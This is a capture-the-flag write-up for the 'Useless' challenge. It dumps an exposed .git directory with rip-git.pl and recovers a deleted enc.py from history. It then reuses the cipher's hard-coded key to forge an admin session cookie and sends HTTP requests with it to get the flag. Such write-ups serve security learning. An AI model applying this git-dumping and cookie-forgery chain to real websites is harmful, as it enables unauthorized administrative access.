Tags: misc web git 


# ▼▼▼Useless - 89pts (Misc:42/170=24.7%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

`http://13.124.66.179`

---

**1.Understanding of the function**

・Create Account

・Login

---

**2.Information Gathering**

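`/.git/` returns a 403 response: the directory exists and only its listing is blocked, so individual files inside it can still be requested one by one.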

```
# perl rip-git.pl -v -u http://13.124.66.179/.git
[i] Downloading git files from http://13.124.66.179/.git
[i] Auto-detecting 404 as 200 with 3 requests
[i] Getting correct 404 responses
[i] Using session name: bjFqLEJf
[d] found COMMIT_EDITMSG
[d] found config
[d] found description
[d] found HEAD
[d] found index
[!] Not found for packed-refs: 404 Not Found
[!] Not found for objects/info/alternates: 404 Not Found
[!] Not found for info/grafts: 404 Not Found
[d] found logs/HEAD
[d] found objects/72/949062a18d1a23d392c87a1a6555cdddb83014
[d] found objects/ab/117952cf9db060c337dcb90e782171377eab0b
[d] found refs/heads/master
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
[i] Got items with git fsck: 0, Items fetched: 0
[!] No more items to fetch. That's it!
Your branch is based on 'origin/master', but the upstream is gone.
(use "git branch --unset-upstream" to fixup)
```

Checking out the downloaded repository yields one file, `readme.md`.

---

`# git log`

```
commit ab117952cf9db060c337dcb90e782171377eab0b (HEAD -> master)
Author: joonuree <[email protected]>
Date: Thu Feb 1 20:09:25 2018 +0900

useless

commit 72949062a18d1a23d392c87a1a6555cdddb83014
Author: joonuree <[email protected]>
Date: Thu Feb 1 20:07:26 2018 +0900
```

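Let's roll back to the earlier commit 72949062a18d1a23d392c87a1a6555cdddb83014, because files dropped in a later commit are still stored in the repository history.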

`# git reset --hard 72949062a18d1a23d392c87a1a6555cdddb83014`

This yields `readme.md` and `enc.py`.

---

`readme.md`

```
## algorithm for session cookie

### Basic
- general user >> username + user IP
- **admin** >> admin + 127.0.0.1

### example
- username : `codegate`, IP : `211.224.255.84`
- `codegate211.224.255.84` >> (encrypt) >> setting cookie
```

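So if I present the session cookie for username `admin` with IP `127.0.0.1`, I should be treated as admin and get the flag. The cookie depends only on these two strings and on the encryption itself, so anyone who has the encryption code can recompute it.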

---

`enc.py`

```
#-*- coding: utf-8 -*-

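class Encrypt():
    """Home-grown 8-byte block cipher that produces the session cookie value.

    The IV and the 16-character key are hard-coded in ``__init__``, so the
    same plaintext always gives the same output and anyone holding this file
    can compute the value for any plaintext.  Only XOR results of the round
    functions reach the ciphertext (see ``encblock``): every output byte is
    an XOR of input bytes and fixed key bytes, with no non-linear step and
    no authentication tag.

    The code runs unchanged on Python 2 and Python 3: ``//`` is used where
    the Python 2 source relied on integer ``/``, and the hex string is built
    with ``%02x`` instead of the Python 2-only ``str.encode('hex')``.
    """

    def __init__(self, iv=None, keystr=None):
        """Set the fixed IV and key and build the 8x8 key matrix.

        ``iv`` and ``keystr`` are accepted but ignored; the hard-coded
        values below are always used.
        """
        self.iv = "useles5@"
        self.keystr = "SUCK_7h15+4lG0_!"

        chunk1 = self.keystr[0:8]
        chunk2 = self.keystr[8:16]

        # init_matrix[i][j] = keystr[i] XOR keystr[8 + j]
        self.init_matrix = [
            [ord(a) ^ ord(b) for b in chunk2] for a in chunk1
        ]

    def split(self, p_txt):
        """Cut ``p_txt`` into 8-character pieces, padding the tail with "x".

        The padding is not self-describing: an input that already ends in
        "x" cannot be told apart from a padded one.
        """
        if len(p_txt) % 8 != 0:
            p_txt += "x" * (8 - len(p_txt) % 8)

        return [p_txt[i:i + 8] for i in range(0, len(p_txt), 8)]

    def change(self, p_txt):
        """Return the padded text as a list of 8-element lists of ``ord`` values."""
        return [[ord(ch) for ch in piece] for piece in self.split(p_txt)]

    def schedule(self, num):
        """Return the key matrix with every row rotated for block ``num``.

        Row ``i`` is rotated by ``shift[i]`` positions; even and odd block
        numbers rotate in opposite directions.
        """
        shift = [1, 2, 3, 2, 2, 1, 2, 3]
        even = num % 2 == 0

        matrix = []
        for i in range(8):
            offset = 8 - shift[i] if even else shift[i]
            matrix.append(
                [self.init_matrix[i][(offset + j) % 8] for j in range(8)]
            )
        return matrix

    def round0(self, p_chunk, k_chunk):
        """Combine block ``p_chunk`` with key row ``k_chunk``; returns 8 ints."""
        p, k = p_chunk, k_chunk
        return [
            p[0] - 10 + k[0],
            p[1] ^ k[1],
            p[2] + k[2],
            p[3] % (k[3] + 2) + 32,
            p[4] * 2 - k[3] - 7,
            p[5] - 11 - k[5] % 13,
            p[6] ^ k[6],
            p[7] * 5 // (k[7] + 5),
        ]

    def round1(self, p_chunk, k_chunk):
        """Combine block ``p_chunk`` with key row ``k_chunk``; returns 8 ints."""
        p, k = p_chunk, k_chunk
        return [
            p[0] - 11 + k[0],
            p[1] ^ (k[1] % 5),
            p[2] ^ k[2],
            p[3] % (k[3] + 2) + 34,
            p[4] - k[3] + 14,
            p[5] ^ k[5],
            p[6] + 9 - k[6],
            p[7] + k[7],
        ]

    def round2(self, p_chunk, k_chunk):
        """Combine block ``p_chunk`` with key row ``k_chunk``; returns 8 ints."""
        p, k = p_chunk, k_chunk
        return [
            p[0] - 11 + k[0],
            p[1] ^ (k[1] % 13),
            p[2] + k[2] + 17,
            p[3] ^ k[3],
            p[4] ^ k[4],
            p[5] - k[5] + 20,
            p[6] // 3 % (k[6] + 15),
            p[7] + k[7],
        ]

    def round3(self, p_chunk, k_chunk):
        """Combine block ``p_chunk`` with key row ``k_chunk``; returns 8 ints."""
        p, k = p_chunk, k_chunk
        return [
            p[0] + k[0],
            # ``-`` binds tighter than ``^``: the subtraction happens first.
            p[1] ^ (k[1] - 15),
            p[2] ^ k[2],
            p[3] + k[3],
            p[4] + k[3] - 33,
            p[5] ^ k[5],
            p[6] + k[6] - 55,
            p[7] + k[7],
        ]

    def round4(self, p_chunk, k_chunk):
        """Combine block ``p_chunk`` with key row ``k_chunk``; returns 8 ints."""
        p, k = p_chunk, k_chunk
        return [
            p[0] + k[0],
            p[1] + k[1] + 17,
            p[2] ^ k[2],
            p[3] - k[3] + 20,
            p[4] % (k[3] + 2) - 34,
            p[5] ^ k[5],
            p[6] + k[6],
            p[7] - 11 + k[7],
        ]

    def round5(self, p_chunk, k_chunk):
        """Combine block ``p_chunk`` with key row ``k_chunk``; returns 8 ints."""
        p, k = p_chunk, k_chunk
        return [
            p[0] // 6 % (k[0] + 1),
            p[1] ^ k[1],
            p[2] - k[2] + 20,
            p[3] - k[3] + 20,
            p[4] % (k[3] + 7) - 34,
            p[5] + k[5],
            p[6] ^ k[6],
            p[7] + k[7],
        ]

    def round6(self, p_chunk, k_chunk):
        """Combine block ``p_chunk`` with key row ``k_chunk``; returns 8 ints."""
        p, k = p_chunk, k_chunk
        return [
            p[0] // 6 % (k[0] + 7),
            p[1] + k[1],
            p[2] ^ k[2],
            p[3] - k[3] % 2 + 55,
            p[4] % (k[3] + 3) + 127,
            p[5] ^ k[5],
            p[6] + k[6] % 3,
            p[7] + 11 + k[7],
        ]

    def round7(self, p_chunk, k_chunk):
        """Combine block ``p_chunk`` with key row ``k_chunk``; returns 8 ints."""
        p, k = p_chunk, k_chunk
        return [
            p[0] + k[0] % 30,
            p[1] // (k[1] + 1),
            p[2] % (k[2] + 4) + 18,
            p[3] ^ k[3],
            p[4] ^ k[4],
            p[5] // (k[5] + 10) + 97,
            p[6] + k[6],
            p[7] // 11 + k[7],
        ]

    def xor_calc(self, iv, chunk):
        """Return the element-wise XOR of two 8-element integer lists."""
        return [iv[i] ^ chunk[i] for i in range(8)]

    def encblock(self, chunk, num):
        """Encrypt one 8-element block; ``num`` is the block's index.

        All eight round functions are evaluated, but only one slot of each
        result is read, and every slot read is a plain ``p ^ k`` entry.
        With the rotations applied by ``schedule``, the key entries behind
        those slots all come from column 0 of ``init_matrix`` for even
        blocks and from column 7 for odd blocks, so of the second key half
        only ``keystr[8]`` and ``keystr[15]`` influence the output.
        """
        rows = self.schedule(num)
        rounds = (
            self.round0, self.round1, self.round2, self.round3,
            self.round4, self.round5, self.round6, self.round7,
        )
        block = [rnd(chunk, rows[i]) for i, rnd in enumerate(rounds)]

        # Slot taken from round i's output for even / odd block numbers.
        if num % 2 == 0:
            slots = (1, 2, 3, 2, 2, 1, 2, 3)
        else:
            slots = (6, 5, 4, 5, 5, 6, 5, 4)
        t = [block[i][slots[i]] for i in range(8)]

        # Each half of the block mixes only the four taps of its own half.
        return [
            chunk[0] ^ t[0] ^ t[1] ^ t[2],
            chunk[1] ^ t[0] ^ t[1] ^ t[3],
            chunk[2] ^ t[0] ^ t[2] ^ t[3],
            chunk[3] ^ t[1] ^ t[2] ^ t[3],
            chunk[4] ^ t[4] ^ t[5] ^ t[6],
            chunk[5] ^ t[4] ^ t[5] ^ t[7],
            chunk[6] ^ t[4] ^ t[6] ^ t[7],
            chunk[7] ^ t[5] ^ t[6] ^ t[7],
        ]

    def encrypt(self, plaintxt):
        """Encrypt ``plaintxt`` and return the result as a lowercase hex string.

        Every block is XORed with the previous ciphertext block (the IV for
        the first block) before it goes through ``encblock``.  Characters
        are expected to have code points below 256.
        """
        p_chunks = self.change(plaintxt)
        e_chunks = []

        previous = self.change(self.iv)[0]
        for i, p_chunk in enumerate(p_chunks):
            mixed = self.xor_calc(previous, p_chunk)
            cipher = self.encblock(mixed, i)
            e_chunks.append(cipher)
            previous = cipher

        # Same output as the Python 2 idiom str.encode('hex').
        return "".join("%02x" % v for chunk in e_chunks for v in chunk)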
```

It is a Python file that defines an `Encrypt` class; the IV and the key string are hard-coded in its constructor.

---

At the end of enc.py, I wrote the following code.

```
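# Session value for admin in the format readme.md gives: "admin" + "127.0.0.1".
e = Encrypt()
# Parenthesised so the line prints the same on Python 2 and Python 3.
print(e.encrypt('admin127.0.0.1'))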
```

```
# python enc.py
7e787c68293431367f6d63236f36694a
```

This is the `useless_session_id` value for admin!!

---

```
GET / HTTP/1.1
Host: 13.124.66.179
Cookie: useless_session_id=7e787c68293431367f6d63236f36694a
```

↓ Response

```
  • admin
  • flag
```

    ```
    GET /flag_6c98a6487611dd8d3adfa25d7f41cfed HTTP/1.1
    Host: 13.124.66.179
    Cookie: useless_session_id=7e787c68293431367f6d63236f36694a
    ```

    ```
    <div class="jumbo">
    <h2>FLAG</h2>
    <h4>Suck Algorithm! It has duplicated keys, So Useless :p</h4>
    <h4>Encrypt the below plain text in { } with key, and Auth IT!</h4>
    <h3>ENCRYPTME{It's_reaLLy_n0nsen5_th4t_I_5p3nt_M0ney_more_7h4n_My_6udg3t.}</h3>
    <h4>Thank you for solving, please enjoy other challenges! :)</h4>
    </div>
    ```

    ENCRYPTME{It's_reaLLy_n0nsen5_th4t_I_5p3nt_M0ney_more_7h4n_My_6udg3t.}

    ---

    At the end of enc.py, I wrote the following code.

    ```
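    # Encrypt the text between the braces of ENCRYPTME{...}, as the flag page asks.
    e = Encrypt()
    # Parenthesised so the line prints the same on Python 2 and Python 3.
    print(e.encrypt("It's_reaLLy_n0nsen5_th4t_I_5p3nt_M0ney_more_7h4n_My_6udg3t."))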
    ```

    ```
    # python enc.py
    1678766808377c204d4a062d550c536f3d783868306d262550154b6129702f485378396821494c52171e695d4f16493c79783f681f4e1c411b045e0b227b2443
    ```

    Get a flag!!